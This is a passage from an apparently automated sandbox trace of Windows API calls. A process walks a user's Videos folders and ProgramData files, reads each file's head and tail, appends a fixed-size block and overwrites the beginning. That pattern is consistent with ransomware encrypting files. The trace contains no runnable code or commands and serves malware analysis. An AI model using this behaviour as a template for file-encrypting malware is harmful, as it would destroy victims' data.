lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0176.050] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x80ab [0176.051] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0176.051] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x80ab [0176.051] WriteFile (in: hFile=0x1f0, lpBuffer=0x25ab808*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ab808*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0176.051] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0176.051] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0176.051] CloseHandle (hObject=0x1f0) returned 1 [0176.052] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\E7yH.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\e7yh.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0176.052] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.052] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1138b [0176.053] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.053] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.053] ReleaseMutex (hMutex=0x168) returned 1 [0176.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E7yH.swf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0176.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="E7yH.swf", cchWideChar=8, lpMultiByteStr=0x1f7362c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="E7yH.swf", lpUsedDefaultChar=0x0) returned 8 [0176.053] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0176.054] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1038b [0176.054] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0176.054] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1038b [0176.054] WriteFile (in: hFile=0x1f0, lpBuffer=0x25ab808*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ab808*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0176.055] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0176.055] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0176.055] CloseHandle (hObject=0x1f0) returned 1 [0176.055] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\EoH7mBquEvOKApaV8\\FHnriB3AfRs-bjT5tWzg\\D2xaZ0IyYGrVzMSwUHK.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\eoh7mbquevokapav8\\fhnrib3afrs-bjt5twzg\\d2xaz0iyygrvzmswuhk.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0176.055] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.055] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2ce9 [0176.056] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.056] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.056] ReleaseMutex (hMutex=0x168) returned 1 [0176.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D2xaZ0IyYGrVzMSwUHK.mkv", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0176.056] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="D2xaZ0IyYGrVzMSwUHK.mkv", cchWideChar=23, lpMultiByteStr=0x1f88c44, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="D2xaZ0IyYGrVzMSwUHK.mkv", lpUsedDefaultChar=0x0) returned 23 [0176.056] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0176.057] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1ce9 [0176.057] ReadFile (in: hFile=0x1f0, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0176.057] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1ce9 [0176.057] WriteFile (in: hFile=0x1f0, lpBuffer=0x25ab808*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ab808*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0176.058] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0176.058] WriteFile (in: hFile=0x1f0, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0176.058] CloseHandle (hObject=0x1f0) returned 1 [0176.058] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\_ZlYUd2JJwlU_wHf\\A0d97FsXrf.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\_zlyud2jjwlu_whf\\a0d97fsxrf.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0176.058] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.059] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x12574 [0176.059] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0176.059] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0176.059] ReleaseMutex (hMutex=0x168) returned 1 [0176.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="A0d97FsXrf.flv", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0176.059] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="A0d97FsXrf.flv", cchWideChar=14, lpMultiByteStr=0x1f7362c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A0d97FsXrf.flv", lpUsedDefaultChar=0x0) returned 14 [0176.059] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.239] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x11574 [0177.239] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.240] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x11574 [0177.240] WriteFile (in: hFile=0x1f0, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.240] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0177.240] WriteFile (in: hFile=0x1f0, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.240] CloseHandle (hObject=0x1f0) returned 1 [0177.241] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\_ZlYUd2JJwlU_wHf\\vuifTep-4o6j41\\my6A-I8ZEhoAeAbs98L-.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\_zlyud2jjwlu_whf\\vuiftep-4o6j41\\my6a-i8zehoaeabs98l-.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.241] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0177.241] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xbe2 [0177.242] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0177.242] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.242] ReleaseMutex (hMutex=0x168) returned 1 [0177.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="my6A-I8ZEhoAeAbs98L-.flv", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0177.242] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="my6A-I8ZEhoAeAbs98L-.flv", cchWideChar=24, lpMultiByteStr=0x1f8fc3c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="my6A-I8ZEhoAeAbs98L-.flv", lpUsedDefaultChar=0x0) returned 24 [0177.242] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0xbe2, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x345f2bc*=0xbe2, lpOverlapped=0x0) returned 1 [0177.243] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0177.243] WriteFile (in: hFile=0x1f0, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x116a, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x345f2d0*=0x116a, lpOverlapped=0x0) returned 1 [0177.244] CloseHandle (hObject=0x1f0) returned 1 [0177.244] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sqbgHDamn\\oPe2.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sqbghdamn\\ope2.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.245] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0177.245] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x182fa [0177.245] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0177.245] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.245] ReleaseMutex (hMutex=0x168) returned 1 [0177.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oPe2.mp4", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0177.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="oPe2.mp4", cchWideChar=8, lpMultiByteStr=0x1f733cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oPe2.mp4", lpUsedDefaultChar=0x0) returned 8 [0177.246] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.247] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x172fa [0177.247] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.247] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x172fa [0177.247] WriteFile (in: hFile=0x1f0, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.248] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0177.248] WriteFile (in: hFile=0x1f0, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.248] CloseHandle (hObject=0x1f0) returned 1 [0177.248] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0178.406] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0178.407] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2f22 [0178.407] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0178.407] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.407] ReleaseMutex (hMutex=0x168) returned 1 [0178.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Help_CValidator.H1D", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0178.407] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Help_CValidator.H1D", cchWideChar=19, lpMultiByteStr=0x1f88c44, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Help_CValidator.H1D", lpUsedDefaultChar=0x0) returned 19 [0178.407] ReadFile (in: hFile=0x204, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.409] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1f22 [0178.410] ReadFile (in: hFile=0x204, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.410] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x1f22 [0178.410] WriteFile (in: hFile=0x204, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0178.411] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0178.411] WriteFile (in: hFile=0x204, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0178.411] CloseHandle (hObject=0x204) returned 1 [0178.412] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.414] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", nBufferLength=0x104, lpBuffer=0x345f694, lpFilePart=0x345f690 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", lpFilePart=0x345f690*="overlay.png") returned 0x63 [0178.414] GetLastError () returned 0x5 [0178.414] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x345f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iͅ폈Hͅ퐔HͅLͅ꠨Ƿ\x01") returned 0x13 [0178.414] LocalFree (hMem=0x69e2b0) returned 0x0 [0178.415] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x345d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0178.415] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x345f894) [0178.415] RtlUnwind (TargetFrame=0x345f8fc, TargetIp=0x406ffc, ExceptionRecord=0x345f378, ReturnValue=0x0) [0178.416] RtlUnwind (TargetFrame=0x345f920, TargetIp=0x407184, ExceptionRecord=0x345f378, ReturnValue=0x0) [0178.416] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png")) returned 0x20 [0178.417] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\cache\\cache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0178.419] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0178.419] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x40270 [0178.419] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0178.419] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.419] ReleaseMutex (hMutex=0x168) returned 1 [0178.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cache.dat", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0178.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cache.dat", cchWideChar=9, lpMultiByteStr=0x1f7360c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cache.dat", lpUsedDefaultChar=0x0) returned 9 [0178.420] ReadFile (in: hFile=0x204, lpBuffer=0x288f948, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0178.423] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3f270 [0178.424] ReadFile (in: hFile=0x204, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0178.426] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3f270 [0178.426] WriteFile (in: hFile=0x204, lpBuffer=0x25ad738*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad738*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0178.426] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, 